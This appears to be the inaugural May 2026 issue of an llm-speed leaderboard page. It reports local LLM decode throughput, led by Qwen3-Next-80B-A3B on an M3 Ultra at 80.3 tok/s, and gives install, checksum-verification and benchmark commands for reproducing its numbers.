
State of the local LLM — May 2026

The canonical answer to “what’s the fastest local LLM right now” as of May 2026, measured under llm-speed suite-v1. Numbers are wall-clock decode tok/s on the highest-decode workload that successfully ran. Every cell links to the run that produced it.
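
Decode tok/s here is simply tokens decoded divided by wall-clock decode seconds. A minimal sketch with made-up counters (not taken from any run on this page):

# hypothetical counters: 8192 tokens decoded over 128.0 s of wall-clock decode time
echo "scale=1; 8192 / 128.0" | bc   # prints 64.0 (tok/s)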

Headline cells

Fastest local model: 80.3 tok/s
Qwen3-Next-80B-A3B-Instruct-MLX-4bit on M3 Ultra (60-core GPU) + 96GB unified (mlx) · View run →

Fastest local 70B+ class: 80.3 tok/s
Qwen3-Next-80B-A3B-Instruct-MLX-4bit on M3 Ultra (60-core GPU) + 96GB unified (mlx) · View run →

Fastest local coding agent: no coder-family submissions this month

Top 10 decode tok/s — May 2026

Editor’s notes

Inaugural issue. The numbers on this page are measured under suite-v1, with the dual-domain trust chain in place (CDN sha256 + GitHub Releases mirror). Both the fastest-model and 70B+-class headlines come from MLX on an M3 Ultra; no coder-family runs were submitted, so the coding-agent headline is empty this month. Future issues will add a delta column showing how each headline moved month over month.

26 runs landed in May 2026. To reproduce any number on this page, install the CLI and run the suite on the same model + hardware:

pipx install https://llm-speed.com/dist/llm_speed-0.0.1-py3-none-any.whl
llm-speed verify
llm-speed bench
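
The dual-domain trust chain mentioned in the notes can also be checked by hand before installing. A rough sketch; the checksum file names and release tag below are assumptions rather than documented paths, and llm-speed verify remains the supported route:

curl -fsSLO https://llm-speed.com/dist/llm_speed-0.0.1-py3-none-any.whl
# assumed CDN checksum location
curl -fsSL https://llm-speed.com/dist/llm_speed-0.0.1-py3-none-any.whl.sha256
# assumed GitHub Releases mirror location
curl -fsSL https://github.com/meadow-kun/llm-speed/releases/download/v0.0.1/llm_speed-0.0.1-py3-none-any.whl.sha256
# the local digest must match both values above
shasum -a 256 llm_speed-0.0.1-py3-none-any.whl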

Methodology: /methodology · Privacy: /privacy · Source: github.com/meadow-kun/llm-speed